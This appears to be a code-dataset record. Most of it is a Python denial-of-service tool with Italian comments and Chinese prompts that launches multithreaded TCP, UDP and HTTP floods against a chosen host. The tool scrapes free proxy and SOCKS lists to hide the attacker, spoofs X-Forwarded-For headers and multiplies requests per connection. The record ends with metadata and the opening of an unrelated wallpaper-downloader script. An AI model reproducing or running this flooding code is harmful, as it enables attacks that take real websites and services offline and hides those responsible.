questo e\n\t\tfloodport() # riparte la funzione e ti fa riscrivere\n\tproxymode()\n\ndef proxymode():\n\tglobal choice2\n\tchoice2 = input(\"你想在攻击中使用代理/IP吗? 如果你愿意,回答'y': \")\n\tif choice2 == \"y\":\n\t\tchoiceproxysocks()\n\telse:\n\t\tnumthreads()\n\ndef choiceproxysocks():\n\tglobal choice3\n\tchoice3 = input(\"键入“0”以使用代理或键入“1”以使用socks: \")\n\tif choice3 == \"0\":\n\t\tchoicedownproxy()\n\telif choice3 == \"1\":\n\t\tchoicedownsocks()\n\telse:\n\t\tprint (\"你错了,再试一次.\")\n\t\tchoiceproxysocks()\n\ndef choicedownproxy():\n\tchoice4 = input(\"您要下载新的代理列表吗? 回答'y'来做: \")\n\tif choice4 == \"y\":\n\t\turlproxy = \"http://free-proxy-list.net/\"\n\t\tproxyget(urlproxy)\n\telse:\n\t\tproxylist()\n\ndef choicedownsocks():\n\tchoice4 = input(\"你想下载一个新的socks列表吗? 回答'y'来做: \")\n\tif choice4 == \"y\":\n\t\turlproxy = \"https://www.socks-proxy.net/\"\n\t\tproxyget(urlproxy)\n\telse:\n\t\tproxylist()\n\ndef proxyget(urlproxy): # lo dice il nome, questa funzione scarica i proxies\n\ttry:\n\t\treq = urllib.request.Request((\"%s\") % (urlproxy)) # qua impostiamo il sito da dove scaricare.\n\t\treq.add_header(\"User-Agent\", random.choice(useragents)) # siccome il format del sito e' identico sia\n\t\tsourcecode = urllib.request.urlopen(req) # per free-proxy-list.net che per socks-proxy.net,\n\t\tpart = str(sourcecode.read()) # imposto la variabile urlproxy in base a cosa si sceglie.\n\t\tpart = part.split(\"<tbody>\")\n\t\tpart = part[1].split(\"</tbody>\")\n\t\tpart = part[0].split(\"<tr><td>\")\n\t\tproxies = \"\"\n\t\tfor proxy in part:\n\t\t\tproxy = proxy.split(\"</td><td>\")\n\t\t\ttry:\n\t\t\t\tproxies=proxies + proxy[0] + \":\" + proxy[1] + \"\\n\"\n\t\t\texcept:\n\t\t\t\tpass\n\t\tout_file = open(\"proxy.txt\",\"w\")\n\t\tout_file.write(\"\")\n\t\tout_file.write(proxies)\n\t\tout_file.close()\n\t\tprint (\"代理已成功下载.\")\n\texcept: # se succede qualche casino\n\t\tprint (\"\\nERROR!\\n\")\n\tproxylist() # se va tutto liscio allora prosegue eseguendo la funzione proxylist()\n\ndef proxylist():\n\tglobal proxies\n\tout_file = str(input(\"输入proxylist文件名/路径(proxy.txt): \"))\n\tif out_file == \"\":\n\t\tout_file = \"proxy.txt\"\n\tproxies = open(out_file).readlines()\n\tnumthreads()\n\ndef numthreads():\n\tglobal threads\n\ttry:\n\t\tthreads = int(input(\"输入线程数(默认为1000): \"))\n\texcept ValueError:\n\t\tthreads = 1000\n\t\tprint (\"1000 threads selected.\\n\")\n\tmultiplication()\n\ndef multiplication():\n\tglobal multiple\n\ttry:\n\t\tmultiple = int(input(\"请输入攻击倍数,推荐50-200 \"))\n\texcept ValueError:\n\t\tmultiple = 100\n\t\tprint(\"Multiple=100 is set\\n\")\n\t\tmultiplication()\n\tbegin()\n\ndef begin():\n\tchoice6 = input(\"按“Enter”开始攻击: \")\n\tif choice6 == \"\":\n\t\tloop()\n\telif choice6 == \"Enter\": #lool\n\t\tloop()\n\telif choice6 == \"enter\": #loool\n\t\tloop()\n\telse:\n\t\texit(0)\n\ndef loop():\n\tglobal threads\n\tglobal get_host\n\tglobal acceptall\n\tglobal connection\n\tglobal go\n\tglobal x\n\tif choice1 == \"0\": # se si e' scelta la http flood, scrive gli header \"statici\" per non appesantire i threads\n\t\tget_host = \"GET \" + url + \" HTTP/1.1\\r\\nHost: \" + url2 + \"\\r\\n\"\n\t\tacceptall = [\n\t\t\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\nAccept-Language: en-US,en;q=0.5\\r\\nAccept-Encoding: gzip, deflate\\r\\n\",\n\t\t\"Accept-Encoding: gzip, deflate\\r\\n\",\n\t\t\"Accept-Language: en-US,en;q=0.5\\r\\nAccept-Encoding: gzip, deflate\\r\\n\",\n\t\t\"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, 
*/*;q=0.8\\r\\nAccept-Language: en-US,en;q=0.5\\r\\nAccept-Charset: iso-8859-1\\r\\nAccept-Encoding: gzip\\r\\n\",\n\t\t\"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\\r\\nAccept-Charset: iso-8859-1\\r\\n\",\n\t\t\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\\r\\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\\r\\nAccept-Charset: utf-8, iso-8859-1;q=0.5\\r\\n\",\n\t\t\"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\\r\\nAccept-Language: en-US,en;q=0.5\\r\\n\",\n\t\t\"Accept: text/html, application/xhtml+xml, image/jxr, */*\\r\\nAccept-Encoding: gzip\\r\\nAccept-Charset: utf-8, iso-8859-1;q=0.5\\r\\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\\r\\n\",\n\t\t\"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\\r\\nAccept-Encoding: gzip\\r\\nAccept-Language: en-US,en;q=0.5\\r\\nAccept-Charset: utf-8, iso-8859-1;q=0.5\\r\\n,\"\n\t\t\"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\\r\\nAccept-Language: en-US,en;q=0.5\\r\\n\",\n\t\t\"Accept-Charset: utf-8, iso-8859-1;q=0.5\\r\\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\\r\\n\",\n\t\t\"Accept: text/html, application/xhtml+xml\",\n\t\t\"Accept-Language: en-US,en;q=0.5\\r\\n\",\n\t\t\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\\r\\n\",\n\t\t\"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\\r\\nAccept-Charset: iso-8859-1\\r\\n\",\n\t\t] # header accept a caso per far sembrare le richieste più legittime\n\t\tconnection = \"Connection: Keep-Alive\\r\\n\" # la keep alive torna sempre utile lol\n\tx = 0 # thanks therunixx, my friend\n\tgo = threading.Event()\n\tif choice1 == \"1\": # se si e' scelto tcp flood\n\t\tif choice2 == \"y\": # e si e scelta la modalita' proxying\n\t\t\tif choice3 == \"0\": # e si sono scelti gli HTTP proxy\n\t\t\t\tfor x in range(threads):\n\t\t\t\t\tTcpFloodProxed(x+1).start() # starta la classe apposita\n\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\t\telse: # altrimenti se si sono scelto è il tcp flood con socks\n\t\t\t\tfor x in range(threads):\n\t\t\t\t\tTcpFloodSocked(x+1).start() # starta la classe apposita\n\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\telse: # se non si sono stati scelti proxy o socks\n\t\t\tfor x in range(threads):\n\t\t\t\tTcpFloodDefault(x+1).start() # starta la classe apposita\n\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\telse: # oppure:\n\t\tif choice1 == \"2\": # se si e' scelto l'UDP flood\n\t\t\tif choice2 == \"y\": # e si e' scelta la modalita' proxying\n\t\t\t\tif choice3 == \"0\": # e si sono scelti gli HTTP proxy\n\t\t\t\t\tfor x in range(threads):\n\t\t\t\t\t\tUdpFloodProxed(x+1).start() # starta la classe apposita\n\t\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\t\t\telse: # se si sono scelti i socks\n\t\t\t\t\tfor x in range(threads):\n\t\t\t\t\t\tUdpFloodSocked(x+1).start() # starta la classe 
apposita\n\t\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\t\telse: # se non si sono scelti proxy o socks per l'udp flood\n\t\t\t\tfor x in range(threads):\n\t\t\t\t\tUdpFloodDefault(x+1).start() # starta la classe apposita\n\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\telse: # se si è scelto l'http flood\n\t\t\tif choice2 == \"y\": # se abbiamo scelto la modalita' proxying\n\t\t\t\tif choice3 == \"0\": # e abbiamo scelto gli HTTP proxy\n\t\t\t\t\tfor x in range(threads):\n\t\t\t\t\t\tRequestProxyHTTP(x+1).start() # starta la classe apposita\n\t\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\t\t\telse: # se abbiamo scelto i socks\n\t\t\t\t\tfor x in range(threads):\n\t\t\t\t\t\tRequestSocksHTTP(x+1).start() # starta la classe apposita\n\t\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\t\telse: # altrimenti manda richieste normali non proxate.\n\t\t\t\tfor x in range(threads):\n\t\t\t\t\tRequestDefaultHTTP(x+1).start() # starta la classe apposita\n\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\nclass TcpFloodProxed(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tdata = random._urandom(1024) # data per il pacchetto random\n\t\tp = bytes(IP(dst=str(url2))/TCP(sport=RandShort(), dport=int(port))/data) # costruzione pacchetto tcp + data\n\t\tcurrent = x # per dare l'id al thread\n\t\tif current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy\n\t\t\tproxy = proxies[current].strip().split(':')\n\t\telse: # altrimenti lo prende a random\n\t\t\tproxy = random.choice(proxies).strip().split(\":\")\n\t\tgo.wait() # aspetta che tutti i proxy siano pronti\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_HTTP, str(proxy[0]), int(proxy[1]), True) # comando per il proxying HTTP\n\t\t\t\ts = socks.socksocket() # creazione socket\n\t\t\t\ts.connect((str(url2),int(port))) # si connette\n\t\t\t\ts.send(p) # ed invia\n\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se si verifica un errore\n\t\t\t\ts.close() # chiude il thread e ricomincia\n\nclass TcpFloodSocked(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. 
Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tdata = random._urandom(1024) # data per il pacchetto random\n\t\tp = bytes(IP(dst=str(url2))/TCP(sport=RandShort(), dport=int(port))/data) # costruzione pacchetto tcp + data\n\t\tcurrent = x # per dare l'id al thread\n\t\tif current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy\n\t\t\tproxy = proxies[current].strip().split(':')\n\t\telse: # altrimenti lo prende a random\n\t\t\tproxy = random.choice(proxies).strip().split(\":\")\n\t\tgo.wait() # aspetta che threads siano pronti\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) # comando per il proxying via SOCKS\n\t\t\t\ts = socks.socksocket() # creazione socket\n\t\t\t\ts.connect((str(url2),int(port))) # si connette\n\t\t\t\ts.send(p) # ed invia\n\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se si verifica un errore\n\t\t\t\ts.close() # intanto chiude il precedente socket non funzionante\n\t\t\t\ttry:\n\t\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) # poi prova ad utilizzare SOCKS4, magari e' questo il problema dell'errore\n\t\t\t\t\ts = socks.socksocket() # creazione socket\n\t\t\t\t\ts.connect((str(url2),int(port))) # connessione\n\t\t\t\t\ts.send(p) # invio\n\t\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print req + counter\n\t\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\t\ts.close()\n\t\t\t\texcept: # se nemmeno questo funge, allora il sock e' down\n\t\t\t\t\tprint (\"Sock down. Retrying request. @\", self.counter)\n\t\t\t\t\ts.close() # chiude il socket e ricomincia ciclo\n\nclass TcpFloodDefault(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tdata = random._urandom(1024) # data per il pacchetto random\n\t\tp = bytes(IP(dst=str(url2))/TCP(sport=RandShort(), dport=int(port))/data) # costruzione pacchetto tcp + data\n\t\tgo.wait() # aspetta che tutti i threads siano pronti\n\t\twhile True: # ciclo infinito\n\t\t\ttry: # il try per non far chiudere il programma se qualcosa va storto\n\t\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # creazione solito socket\n\t\t\t\ts.connect((str(url2),int(port))) # connessione al target\n\t\t\t\ts.send(p) # questo manda il pacchetto tcp creato al target\n\t\t\t\tprint (\"Request Sent! 
@\", self.counter) # print richiesta + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se si verifica un errore\n\t\t\t\ts.close() # lo ignora e ricomincia il ciclo\n\nclass UdpFloodProxed(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tdata = random._urandom(1024) # data per il pacchetto random\n\t\tp = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data) # crea pacchetto udp classico + data\n\t\tcurrent = x # per dare l'id al thread\n\t\tif current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy\n\t\t\tproxy = proxies[current].strip().split(':')\n\t\telse: # altrimenti lo prende a random\n\t\t\tproxy = random.choice(proxies).strip().split(\":\")\n\t\tgo.wait() # aspetta che threads sono pronti\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_HTTP, str(proxy[0]), int(proxy[1]), True) # comando per il proxying HTTP\n\t\t\t\ts = socks.socksocket() # creazione socket\n\t\t\t\ts.connect((str(url2),int(port))) # connessione\n\t\t\t\ts.send(p) # invio\n\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se qualcosa va storto\n\t\t\t\ts.close() # chiude il socket\n\nclass UdpFloodSocked(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. 
Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tdata = random._urandom(1024) # data per il pacchetto random\n\t\tp = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data) # crea pacchetto udp classico + data\n\t\tcurrent = x # per dare l'id al thread\n\t\tif current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy\n\t\t\tproxy = proxies[current].strip().split(':')\n\t\telse: # altrimenti lo prende a random\n\t\t\tproxy = random.choice(proxies).strip().split(\":\")\n\t\tgo.wait() # aspetta che threads siano pronti\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) # comando per il proxying con SOCKS\n\t\t\t\ts = socks.socksocket() # creazione socket\n\t\t\t\ts.connect((str(url2),int(port))) # connessione\n\t\t\t\ts.send(p) # invio\n\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se qualcosa va storto questo except chiude il socket e si collega al try sotto\n\t\t\t\ts.close() # intanto chiude il precedente socket non funzionante\n\t\t\t\ttry:\n\t\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) # poi prova ad utilizzare SOCKS4, magari e' questo il problema dell'errore\n\t\t\t\t\ts = socks.socksocket() # creazione socket\n\t\t\t\t\ts.connect((str(url2),int(port))) # connessione\n\t\t\t\t\ts.send(p) # invio\n\t\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # req + counter\n\t\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\t\ts.close()\n\t\t\t\texcept: # se nemmeno questo funge, allora il sock e' down\n\t\t\t\t\tprint (\"Sock down. Retrying request. @\", self.counter)\n\t\t\t\t\ts.close() # chiude il socket e ricomincia ciclo\n\nclass UdpFloodDefault(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tdata = random._urandom(1024) # data per il pacchetto random\n\t\tp = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data) # crea pacchetto udp classico + data\n\t\tgo.wait() # aspetta che i threads siano pronti\n\t\twhile True: # ciclo infinito\n\t\t\ttry: # il try per non far chiudere il programma se si verifica qualche errore\n\t\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # creazione socket\n\t\t\t\ts.connect((str(url2),int(port))) # connessione al target\n\t\t\t\ts.send(p) # questo manda il pacchetto udp creato al target\n\t\t\t\tprint (\"Request Sent! 
@\", self.counter) # print req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se si verifica un errore\n\t\t\t\ts.close() # lo ignora e ricomincia il ciclo\n\nclass RequestProxyHTTP(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tuseragent = \"User-Agent: \" + random.choice(useragents) + \"\\r\\n\" # scelta useragent a caso\n\t\taccept = random.choice(acceptall) # scelta header accept a caso\n\t\trandomip = str(random.randint(0,255)) + \".\" + str(random.randint(0,255)) + \".\" + str(random.randint(0,255)) + \".\" + str(random.randint(0,255))\n\t\tforward = \"X-Forwarded-For: \" + randomip + \"\\r\\n\" # X-Forwarded-For, un header HTTP che permette di incrementare anonimato (vedi google per info)\n\t\trequest = get_host + useragent + accept + forward + connection + \"\\r\\n\" # ecco la final request\n\t\tcurrent = x # per dare l'id al thread\n\t\tif current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy\n\t\t\tproxy = proxies[current].strip().split(':')\n\t\telse: # altrimenti lo prende a random\n\t\t\tproxy = random.choice(proxies).strip().split(\":\")\n\t\tgo.wait() # aspetta che i threads siano pronti\n\t\twhile True: # ciclo infinito\n\t\t\ttry:\n\t\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # ecco il nostro socket\n\t\t\t\ts.connect((str(proxy[0]), int(proxy[1]))) # connessione al proxy\n\t\t\t\ts.send(str.encode(request)) # encode in bytes della richiesta HTTP\n\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print delle richieste\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(request)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept:\n\t\t\t\ts.close() # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\nclass RequestSocksHTTP(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. 
Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tuseragent = \"User-Agent: \" + random.choice(useragents) + \"\\r\\n\" # scelta proxy a caso\n\t\taccept = random.choice(acceptall) # scelta accept a caso\n\t\trequest = get_host + useragent + accept + connection + \"\\r\\n\" # composizione final request\n\t\tcurrent = x # per dare l'id al thread\n\t\tif current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy\n\t\t\tproxy = proxies[current].strip().split(':')\n\t\telse: # altrimenti lo prende a random\n\t\t\tproxy = random.choice(proxies).strip().split(\":\")\n\t\tgo.wait() # aspetta che threads siano pronti\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) # comando per proxarci con i socks\n\t\t\t\ts = socks.socksocket() # creazione socket con pysocks\n\t\t\t\ts.connect((str(url2), int(urlport))) # connessione\n\t\t\t\ts.send (str.encode(request)) # invio\n\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(request)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se qualcosa va storto questo except chiude il socket e si collega al try sotto\n\t\t\t\ts.close() # chiude socket\n\t\t\t\ttry: # il try prova a vedere se l'errore e' causato dalla tipologia di socks errata, infatti prova con SOCKS4\n\t\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) # prova con SOCKS4\n\t\t\t\t\ts = socks.socksocket() # creazione nuovo socket\n\t\t\t\t\ts.connect((str(url2), int(urlport))) # connessione\n\t\t\t\t\ts.send (str.encode(request)) # invio\n\t\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print req + counter\n\t\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\t\ts.send(str.encode(request)) # encode in bytes della richiesta HTTP\n\t\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\t\ts.close()\n\t\t\t\texcept:\n\t\t\t\t\tprint (\"Sock down. Retrying request. @\", self.counter)\n\t\t\t\t\ts.close() # se nemmeno con quel try si e' riuscito a inviare niente, allora il sock e' down e chiude il socket.\n\nclass RequestDefaultHTTP(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. 
Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tuseragent = \"User-Agent: \" + random.choice(useragents) + \"\\r\\n\" # useragent a caso\n\t\taccept = random.choice(acceptall) # accept a caso\n\t\trequest = get_host + useragent + accept + connection + \"\\r\\n\" # composizione final request\n\t\tgo.wait() # aspetta che i threads siano pronti\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # creazione socket\n\t\t\t\ts.connect((str(url2), int(urlport))) # connessione\n\t\t\t\ts.send (str.encode(request)) # invio\n\t\t\t\tprint (\"Request sent! @\", self.counter) # print req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(request)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se qualcosa va storto\n\t\t\t\ts.close() # chiude socket e ricomincia\n\n\nif __name__ == '__main__':\n\tstarturl() # questo fa startare la prima funzione del programma, che a sua volta ne starta un altra, poi un altra, fino ad arrivare all'attacco.\n" } ]
1
anmac/ACWallpaper
https://github.com/anmac/ACWallpaper
8cd81947696e67e3926190420cf696dbc849cb82
f30a4769634c99af38a8af82f0a868680c3f55e5
48d754bf3dde5b0107f3a2d78a2237ad510ab95f
refs/heads/master
2021-01-20T18:54:43.194252
2016-08-08T06:31:34
2016-08-08T06:31:34
65,177,498
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6217345595359802, "alphanum_fraction": 0.6729362607002258, "avg_line_length": 25.150684356689453, "blob_id": "20ff068250a9545ff6e80bc51f5e75566a206042", "content_id": "00e604b7a545df44d482dac1494829633acf2ebf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1938, "license_type": "no_license", "max_line_length": 136, "num_lines": 73, "path": "/DownWallpaper.py", "repo_name": "anmac/ACWallpaper", "src_encoding": "UTF-8", "text": "#coding=utf-8\n\nimport urllib\nimport urllib2\nimport cookielib\nfrom lxml import etree\nimport json\nimport sys\nimport os\n\n\ndef getPhotoList(url):\n\n\tdicPath = '/Users/huajianma/Pictures/ACWallpaper'\n # if not os.path.exists(dicPath):\n # os.makedirs(dicPath)\n\n\t# proxy_handler \t\t= urllib2.ProxyHandler({\"https\":\"https://huafenr.com/f/a903c12da03e0d3f40be\"})\n\t# # null_proxy_handler = urllib2.ProxyHandler({})\n\t# opener \t\t\t\t= urllib2.build_opener(proxy_handler)\n\t# urllib2.install_opener(opener)#全局\n # # opener = urllib2.build_opener(null_proxy_handler)\n\n\n\tuserAgent\t= \t'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 